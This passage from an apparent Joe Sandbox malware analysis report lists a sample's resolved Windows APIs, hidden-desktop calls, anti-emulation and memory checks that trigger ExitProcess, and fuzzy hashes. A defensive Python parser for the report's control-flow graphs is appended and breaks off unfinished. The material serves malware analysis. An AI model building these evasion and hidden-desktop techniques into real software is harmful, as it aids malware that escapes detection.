                                • GetProcAddress.KERNEL32(77190000,016CD430), ref: 00E668DC
                                • GetProcAddress.KERNEL32(77190000,016CD310), ref: 00E668F4
                                • GetProcAddress.KERNEL32(77190000,016CD160), ref: 00E6690C
                                • GetProcAddress.KERNEL32(77190000,016B55A8), ref: 00E66925
                                • GetProcAddress.KERNEL32(77190000,016CD178), ref: 00E6693D
                                • GetProcAddress.KERNEL32(77190000,016CD418), ref: 00E66955
                                • GetProcAddress.KERNEL32(77190000,016CD2E0), ref: 00E6696E
                                • GetProcAddress.KERNEL32(77190000,016CD238), ref: 00E66986
                                • GetProcAddress.KERNEL32(77190000,016CD3B8), ref: 00E6699E
                                • GetProcAddress.KERNEL32(77190000,016CD250), ref: 00E669B7
                                • GetProcAddress.KERNEL32(77190000,016CD2B0), ref: 00E669CF
                                • GetProcAddress.KERNEL32(77190000,016CD1C0), ref: 00E669E7
                                • GetProcAddress.KERNEL32(77190000,016CD1D8), ref: 00E66A00
                                • GetProcAddress.KERNEL32(77190000,016BFDD8), ref: 00E66A18
                                • GetProcAddress.KERNEL32(77190000,016CD1F0), ref: 00E66A30
                                • GetProcAddress.KERNEL32(77190000,016CD268), ref: 00E66A49
                                • GetProcAddress.KERNEL32(77190000,016B55C8), ref: 00E66A61
                                • GetProcAddress.KERNEL32(77190000,016CD280), ref: 00E66A79
                                • GetProcAddress.KERNEL32(77190000,016B55E8), ref: 00E66A92
                                • GetProcAddress.KERNEL32(77190000,016CD2C8), ref: 00E66AAA
                                • GetProcAddress.KERNEL32(77190000,016CD2F8), ref: 00E66AC2
                                • GetProcAddress.KERNEL32(77190000,016B5428), ref: 00E66ADB
                                • GetProcAddress.KERNEL32(77190000,016B5608), ref: 00E66AF3
                                • LoadLibraryA.KERNEL32(016CD388,00E6051F), ref: 00E66B05
                                • LoadLibraryA.KERNEL32(016CD328), ref: 00E66B16
                                • LoadLibraryA.KERNEL32(016CD340), ref: 00E66B28
                                • LoadLibraryA.KERNEL32(016CD358), ref: 00E66B3A
                                • LoadLibraryA.KERNEL32(016CD370), ref: 00E66B4B
                                • LoadLibraryA.KERNEL32(016CD3A0), ref: 00E66B5D
                                • LoadLibraryA.KERNEL32(016CD3D0), ref: 00E66B6F
                                • LoadLibraryA.KERNEL32(016CD448), ref: 00E66B80
                                • GetProcAddress.KERNEL32(77040000,016B5328), ref: 00E66B9C
                                • GetProcAddress.KERNEL32(77040000,016CD580), ref: 00E66BB4
                                • GetProcAddress.KERNEL32(77040000,016C8AF8), ref: 00E66BCD
                                • GetProcAddress.KERNEL32(77040000,016CD688), ref: 00E66BE5
                                • GetProcAddress.KERNEL32(77040000,016B5228), ref: 00E66BFD
                                • GetProcAddress.KERNEL32(73D20000,016BA708), ref: 00E66C1D
                                • GetProcAddress.KERNEL32(73D20000,016B5368), ref: 00E66C35
                                • GetProcAddress.KERNEL32(73D20000,016BA730), ref: 00E66C4E
                                • GetProcAddress.KERNEL32(73D20000,016CD568), ref: 00E66C66
                                • GetProcAddress.KERNEL32(73D20000,016CD4A8), ref: 00E66C7E
                                • GetProcAddress.KERNEL32(73D20000,016B4F88), ref: 00E66C97
                                • GetProcAddress.KERNEL32(73D20000,016B5268), ref: 00E66CAF
                                • GetProcAddress.KERNEL32(73D20000,016CD640), ref: 00E66CC7
                                • GetProcAddress.KERNEL32(768D0000,016B50A8), ref: 00E66CE3
                                • GetProcAddress.KERNEL32(768D0000,016B52A8), ref: 00E66CFB
                                • GetProcAddress.KERNEL32(768D0000,016CD658), ref: 00E66D14
                                • GetProcAddress.KERNEL32(768D0000,016CD4F0), ref: 00E66D2C
                                • GetProcAddress.KERNEL32(768D0000,016B4FA8), ref: 00E66D44
                                • GetProcAddress.KERNEL32(75790000,016BA550), ref: 00E66D64
                                • GetProcAddress.KERNEL32(75790000,016BA6B8), ref: 00E66D7C
                                • GetProcAddress.KERNEL32(75790000,016CD460), ref: 00E66D95
                                • GetProcAddress.KERNEL32(75790000,016B50C8), ref: 00E66DAD
                                • GetProcAddress.KERNEL32(75790000,016B5288), ref: 00E66DC5
                                • GetProcAddress.KERNEL32(75790000,016BA528), ref: 00E66DDE
                                • GetProcAddress.KERNEL32(75A10000,016CD478), ref: 00E66DFE
                                • GetProcAddress.KERNEL32(75A10000,016B5308), ref: 00E66E16
                                • GetProcAddress.KERNEL32(75A10000,016C8B98), ref: 00E66E2F
                                • GetProcAddress.KERNEL32(75A10000,016CD490), ref: 00E66E47
                                • GetProcAddress.KERNEL32(75A10000,016CD670), ref: 00E66E5F
                                • GetProcAddress.KERNEL32(75A10000,016B5248), ref: 00E66E78
                                • GetProcAddress.KERNEL32(75A10000,016B5068), ref: 00E66E90
                                • GetProcAddress.KERNEL32(75A10000,016CD598), ref: 00E66EA8
                                • GetProcAddress.KERNEL32(75A10000,016CD4C0), ref: 00E66EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00E66ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00E66EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00E66F05
                                • GetProcAddress.KERNEL32(76850000,016B50E8), ref: 00E66F21
                                • GetProcAddress.KERNEL32(76850000,016CD6A0), ref: 00E66F39
                                • GetProcAddress.KERNEL32(76850000,016CD4D8), ref: 00E66F52
                                • GetProcAddress.KERNEL32(76850000,016CD508), ref: 00E66F6A
                                • GetProcAddress.KERNEL32(76850000,016CD5E0), ref: 00E66F82
                                • GetProcAddress.KERNEL32(75690000,016B5088), ref: 00E66F9E
                                • GetProcAddress.KERNEL32(75690000,016B5108), ref: 00E66FB6
                                • GetProcAddress.KERNEL32(769C0000,016B52E8), ref: 00E66FD2
                                • GetProcAddress.KERNEL32(769C0000,016CD700), ref: 00E66FEA
                                • GetProcAddress.KERNEL32(6F8C0000,016B5348), ref: 00E6700A
                                • GetProcAddress.KERNEL32(6F8C0000,016B52C8), ref: 00E67022
                                • GetProcAddress.KERNEL32(6F8C0000,016B5128), ref: 00E6703B
                                • GetProcAddress.KERNEL32(6F8C0000,016CD5B0), ref: 00E67053
                                • GetProcAddress.KERNEL32(6F8C0000,016B5188), ref: 00E6706B
                                • GetProcAddress.KERNEL32(6F8C0000,016B5148), ref: 00E67084
                                • GetProcAddress.KERNEL32(6F8C0000,016B4FC8), ref: 00E6709C
                                • GetProcAddress.KERNEL32(6F8C0000,016B5168), ref: 00E670B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00E670CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00E670E2
                                • GetProcAddress.KERNEL32(75D90000,016CD5C8), ref: 00E670FE
                                • GetProcAddress.KERNEL32(75D90000,016C8C18), ref: 00E67116
                                • GetProcAddress.KERNEL32(75D90000,016CD520), ref: 00E6712F
                                • GetProcAddress.KERNEL32(75D90000,016CD5F8), ref: 00E67147
                                • GetProcAddress.KERNEL32(76470000,016B51A8), ref: 00E67163
                                • GetProcAddress.KERNEL32(6D7A0000,016CD538), ref: 00E6717F
                                • GetProcAddress.KERNEL32(6D7A0000,016B4FE8), ref: 00E67197
                                • GetProcAddress.KERNEL32(6D7A0000,016CD550), ref: 00E671B0
                                • GetProcAddress.KERNEL32(6D7A0000,016CD730), ref: 00E671C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 7c749b0fe7a1735e13921babf1369be8564fbdb5d6af8902953f4143bde2a739
                                • Instruction ID: 14162606d5f276fe800d35f6adc5f1bacfc084f68fff02ded661d8aacf48c934
                                • Opcode Fuzzy Hash: 7c749b0fe7a1735e13921babf1369be8564fbdb5d6af8902953f4143bde2a739
                                • Instruction Fuzzy Hash: 266233B5E602049FD775DF64E84CA2637B9F788329314891AF9D5A334CD73E9800DBA0
                                APIs
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F1D5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F1F1
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F1FC
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F215
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E5F220
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F239
                                • lstrcpy.KERNEL32(00000000,00E74FA0), ref: 00E5F25E
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F28C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F2C0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5F2F0
                                • lstrlen.KERNEL32(016B56C8), ref: 00E5F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 9bfe10d1a43f994d116b8ef5af94820f2787f5203cfa9528545d05960cea0624
                                • Instruction ID: 9258acabadf697401c479f3169ea175d4a1d7d85cec21fed43e196d5a46f5d8f
                                • Opcode Fuzzy Hash: 9bfe10d1a43f994d116b8ef5af94820f2787f5203cfa9528545d05960cea0624
                                • Instruction Fuzzy Hash: CEA26B70A012019FCB20EF68E848A5ABBF5AF44319F18A87DE849FB355EB35DC45CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60013
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E600BD
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E600E1
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E600EC
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60110
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E6011B
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6013F
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E6015A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60189
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E60194
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E601C3
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E601CE
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60206
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E60250
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E60288
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6059B
                                • lstrlen.KERNEL32(016B5528), ref: 00E605AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E605D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00E605E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6060E
                                • lstrlen.KERNEL32(016CEDC8), ref: 00E60625
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6064C
                                • lstrcat.KERNEL32(00000000,?), ref: 00E60658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E60681
                                • lstrlen.KERNEL32(016B5648), ref: 00E60698
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E606C9
                                • lstrcat.KERNEL32(00000000,?), ref: 00E606D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E60706
                                • lstrcpy.KERNEL32(00000000,016C8C78), ref: 00E6074B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E6077F
                                • lstrcpy.KERNEL32(00000000,016CEED0), ref: 00E607E7
                                • lstrcpy.KERNEL32(00000000,016C8908), ref: 00E60858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 00E608CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E60928
                                • lstrcpy.KERNEL32(00000000,016C88F8), ref: 00E609F8
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E42528
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E4254E
                                  • Part of subcall function 00E424E0: lstrcpy.KERNEL32(00000000,?), ref: 00E42577
                                • lstrcpy.KERNEL32(00000000,016C8A28), ref: 00E60ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E60B81
                                • lstrcpy.KERNEL32(00000000,016C8A28), ref: 00E60D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 387884d6d97963c93457fd94637d6d06f66790881665b4e880cdcf43194b2208
                                • Instruction ID: 766b5f1bec96c7b317e0afc40159f62166f3884177b7d45085252775541a9739
                                • Opcode Fuzzy Hash: 387884d6d97963c93457fd94637d6d06f66790881665b4e880cdcf43194b2208
                                • Instruction Fuzzy Hash: 6CE28F70A453408FC734DF29E488B5ABBE0BF88358F5895ADE48DAB352DB35D841CB52
                                APIs
                                • lstrlen.KERNEL32(016B56C8), ref: 00E5F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F47B
                                • lstrcpy.KERNEL32(00000000,016B56C8), ref: 00E5F4BB
                                • lstrcpy.KERNEL32(00000000,016C8BF8), ref: 00E5F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E5F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5F718
                                • lstrlen.KERNEL32(016C8AC8), ref: 00E5F746
                                • lstrcpy.KERNEL32(00000000,016C8AC8), ref: 00E5F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5FA32
                                • lstrlen.KERNEL32(016C8B18), ref: 00E5FA60
                                • lstrcpy.KERNEL32(00000000,016C8B18), ref: 00E5FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 3905298fab7d4039c015ae8a5006722565924ce8b740501581da9815724d6383
                                • Instruction ID: 08c181f05d8b9d8b3f7b6dc001cc16d557511b00d4c5c622a56a13bc578dd5ed
                                • Opcode Fuzzy Hash: 3905298fab7d4039c015ae8a5006722565924ce8b740501581da9815724d6383
                                • Instruction Fuzzy Hash: A2F13870A01201CFDB24DF29D448A69B7F5BF4431AB18D8BED849AB396E736DC46CB50

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e58ca0-e58eef, with nodes calling StrCmpCA, ExitProcess, lstrlen and lstrcpy and subcalls to e42a20 and e42930
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: fe9baf29b13ba8c94b7cfc44c5ff2a2d608db1eafca2173b763f376672b90dd8
                                • Instruction ID: 32df71387f190472c06d5c579c21eea9573797e4d06582dead975ade5246eff0
                                • Opcode Fuzzy Hash: fe9baf29b13ba8c94b7cfc44c5ff2a2d608db1eafca2173b763f376672b90dd8
                                • Instruction Fuzzy Hash: 3F51B070900301AFC7219F75DE89A6BB7F4BB04709B00AC1DFA82F2640DF78E8458B61

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e62740-e62872, with nodes calling GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA and a subcall to e671e0
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00E6277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00E593B6,00000000,00000000,00000000,00000000), ref: 00E627AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E6280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62816
                                • wsprintfA.USER32 ref: 00E6283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 6b1b37d06cd96115c0bb78c145f1967dbb5c3457922e02cd1f6b7c74115f617a
                                • Instruction ID: e49ac8777d79c7a9575142994e0c56dbf013b20a0fae559b0a48afc3982f9033
                                • Opcode Fuzzy Hash: 6b1b37d06cd96115c0bb78c145f1967dbb5c3457922e02cd1f6b7c74115f617a
                                • Instruction Fuzzy Hash: EC3190B1D482099FCB14CFB899899EFBFBCEF58750F10416EE615F7244E2349A408BA1

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e44bc0-e44c48, with nodes calling ??2@YAPAXI@Z (3 times), lstrlen and InternetCrackUrlA and a subcall to e42a20
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00E44BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E44C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E44C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00E44C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00E44C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 84e29408be2ef7048db8c2c4796585b5d797592be7a71bcbf6552b7446b44a21
                                • Instruction ID: 9951676312a420ddb3a67e4ec31e9cd6bfb71102537e806288dd0e3c10800721
                                • Opcode Fuzzy Hash: 84e29408be2ef7048db8c2c4796585b5d797592be7a71bcbf6552b7446b44a21
                                • Instruction Fuzzy Hash: 26012D71D00218AFDB14DFA9E849B9EBBB8EB08364F00812AF954F7390DB7459058FD4

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e41030-e410b6, with nodes calling GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc and VirtualFree
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                • ExitProcess.KERNEL32 ref: 00E41058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E4106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E410AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 25a34c7fa5dbd561bee02f0213992a20907d4898e1d96b1ea4fd99d75e65771b
                                • Instruction ID: 9e9e5d5272282bbdded8c0fb7c0e803a2ab4ef5015135e421a7a7cadbb4e428c
                                • Opcode Fuzzy Hash: 25a34c7fa5dbd561bee02f0213992a20907d4898e1d96b1ea4fd99d75e65771b
                                • Instruction Fuzzy Hash: F901F971B402047BEB2045656C1DF5B77ADA744B19F308014F744F72C4D9B6E9008664

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e5ee90-e5efa0, with nodes calling lstrcpy and StrCmpCA and subcalls to e42930, e46c40 and e42a20 (the last 10 times)
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 8cbb9937e4f3f0b1d9e63f6cd8f6a8e447348288435ff03504dbee5151d9c3b4
                                • Instruction ID: 6e62a909ddac344eea38e812bd6110eb6f3e497ccf87c2980ef7ecc9afddb709
                                • Opcode Fuzzy Hash: 8cbb9937e4f3f0b1d9e63f6cd8f6a8e447348288435ff03504dbee5151d9c3b4
                                • Instruction Fuzzy Hash: 9921FD706202059BCB25BF79EC46A9A77E4AF14305F44682CBD4AFB342DF30ED1487A0

                                 Control-flow Graph
                                 • Rendered graph omitted: basic blocks e410c0-e4111d, with nodes calling GlobalMemoryStatusEx and ExitProcess
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 789bfca02ca89242d542df3788d9834d24bfff0a74c20a323e0dd4ea019d3e4c
                                • Instruction ID: f764683902b9fc2f047707a9873b14ff1e03380cbfb90d4c64611c1e1a529ea5
                                • Opcode Fuzzy Hash: 789bfca02ca89242d542df3788d9834d24bfff0a74c20a323e0dd4ea019d3e4c
                                • Instruction Fuzzy Hash: 2EF05C701182484BEF206B64F80A32DF7D8EB04354F1019A9EEDBE2380E230DCC08267
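The control_flow_graph lines in this report are Joe Sandbox's raw edge lists (block id, address range, the API or call made in that block, then src->dst edges), which get hard to read once a function has dozens of blocks. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses that format, lists the blocks that branch straight into an ExitProcess block (the evasion decisions), the blocks from which an exit is reachable at all, and any block that fans out into many successors (a jump table or command switch). The two embedded inputs are the e410c0 graph from this entry and the e58c88 graph from the entry that follows, copied verbatim from the report; the token grammar (decimal block id, hex range, label words up to the next block or edge) is inferred from the graphs on this page and is an assumption.

```python
"""Parse the control_flow_graph edge lists Joe Sandbox emits and pull out the
blocks that decide between continuing and ExitProcess, plus any dispatch block.
Added example; the token grammar is inferred from the graphs on this page."""
import re
from collections import defaultdict

# Sample inputs copied verbatim from this report (not constructed): the e410c0
# function (GlobalMemoryStatusEx, then a conditional ExitProcess) and the e58c88
# function (a StrCmpCA gate in front of a 13-way dispatch).
CFG_MEMCHECK = (
    "2886 e410c0-e410cb 2887 e410d0-e410dc 2886->2887 2889 e410de-e410f3 "
    "GlobalMemoryStatusEx 2887->2889 2890 e410f5-e41106 2889->2890 2891 e41112-e41114 "
    "ExitProcess 2889->2891 2892 e41108 2890->2892 2893 e4111a-e4111d 2890->2893 "
    "2892->2891 2894 e4110a-e41110 2892->2894 2894->2891 2894->2893"
)
CFG_DISPATCH = (
    "2895 e58c88-e58cc4 StrCmpCA 2897 e58cc6-e58cc7 ExitProcess 2895->2897 "
    "2898 e58ccd-e58ce6 2895->2898 2900 e58ee2-e58eef call e42a20 2898->2900 "
    "2901 e58cec-e58cf1 2898->2901 2903 e58cf6-e58cf9 2901->2903 2905 e58ec3-e58edc "
    "2903->2905 2906 e58cff 2903->2906 2905->2900 2945 e58cf3 2905->2945 "
    "2907 e58d84-e58d92 StrCmpCA 2906->2907 2908 e58da4-e58db8 StrCmpCA 2906->2908 "
    "2909 e58d06-e58d15 lstrlen 2906->2909 2910 e58e6f-e58e7d StrCmpCA 2906->2910 "
    "2911 e58e88-e58e9a lstrlen 2906->2911 2912 e58e56-e58e64 StrCmpCA 2906->2912 "
    "2913 e58d30-e58d3f lstrlen 2906->2913 2914 e58dbd-e58dcb StrCmpCA 2906->2914 "
    "2915 e58ddd-e58deb StrCmpCA 2906->2915 2916 e58dfd-e58e0b StrCmpCA 2906->2916 "
    "2917 e58e1d-e58e2b StrCmpCA 2906->2917 2918 e58e3d-e58e4b StrCmpCA 2906->2918 "
    "2919 e58d5a-e58d69 lstrlen 2906->2919 2907->2905 2932 e58d98-e58d9f 2907->2932 "
    "2908->2905 2920 e58d17-e58d1c call e42a20 2909->2920 2921 e58d1f-e58d2b call e42930 "
    "2909->2921 2910->2905 2924 e58e7f-e58e86 2910->2924 2925 e58ea4-e58eb0 call e42930 "
    "2911->2925 2926 e58e9c-e58ea1 call e42a20 2911->2926 2912->2905 2923 e58e66-e58e6d "
    "2912->2923 2927 e58d41-e58d46 call e42a20 2913->2927 2928 e58d49-e58d55 call e42930 "
    "2913->2928 2914->2905 2933 e58dd1-e58dd8 2914->2933 2915->2905 2934 e58df1-e58df8 "
    "2915->2934 2916->2905 2935 e58e11-e58e18 2916->2935 2917->2905 2936 e58e31-e58e38 "
    "2917->2936 2918->2905 2922 e58e4d-e58e54 2918->2922 2929 e58d73-e58d7f call e42930 "
    "2919->2929 2930 e58d6b-e58d70 call e42a20 2919->2930 2920->2921 2954 e58eb3-e58eb5 "
    "2921->2954 2922->2905 2923->2905 2924->2905 2925->2954 2926->2925 2927->2928 "
    "2928->2954 2929->2954 2930->2929 2932->2905 2933->2905 2934->2905 2935->2905 "
    "2936->2905 2945->2903 2954->2905 2955 e58eb7-e58eb9 2954->2955 2955->2905 "
    "2956 e58ebb-e58ebd lstrcpy 2955->2956 2956->2905"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> {'addr', 'label'}, edges is a
    list of (src, dst). A decimal token followed by a hex range starts a block;
    the tokens after the range, up to the next block or edge, are its label."""
    nodes, edges, cur = {}, [], None
    toks = text.split()
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None
        elif tok.isdigit() and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            cur = int(tok)
            nodes[cur] = {"addr": toks[i + 1], "label": ""}
            i += 1
        elif cur is not None:
            nodes[cur]["label"] = (nodes[cur]["label"] + " " + tok).strip()
        else:
            raise ValueError(f"unexpected token {tok!r}")
        i += 1
    return nodes, edges


def _preds(edges):
    p = defaultdict(list)
    for s, d in edges:
        p[d].append(s)
    return p


def exit_decisions(nodes, edges, api="ExitProcess"):
    """Map each block that calls `api` to the sorted blocks branching into it:
    those are the checks whose outcome decides whether the sample dies."""
    p = _preds(edges)
    return {n: sorted(p[n]) for n, v in nodes.items() if api in v["label"].split()}


def can_reach(nodes, edges, api="ExitProcess"):
    """Blocks (including the `api` block itself) from which a call to `api`
    is reachable; a reverse walk over the predecessor map."""
    p = _preds(edges)
    seen = set(exit_decisions(nodes, edges, api))
    stack = list(seen)
    while stack:
        n = stack.pop()
        for s in p[n]:
            if s not in seen:
                seen.add(s)
                stack.append(s)
    return seen


def dispatch_blocks(nodes, edges, min_out=3):
    """Blocks with at least `min_out` successors: jump tables / command switches."""
    out = defaultdict(int)
    for s, _ in edges:
        out[s] += 1
    return {n: c for n, c in out.items() if c >= min_out}


if __name__ == "__main__":
    for name, text in (("e410c0", CFG_MEMCHECK), ("e58c88", CFG_DISPATCH)):
        nodes, edges = parse_cfg(text)
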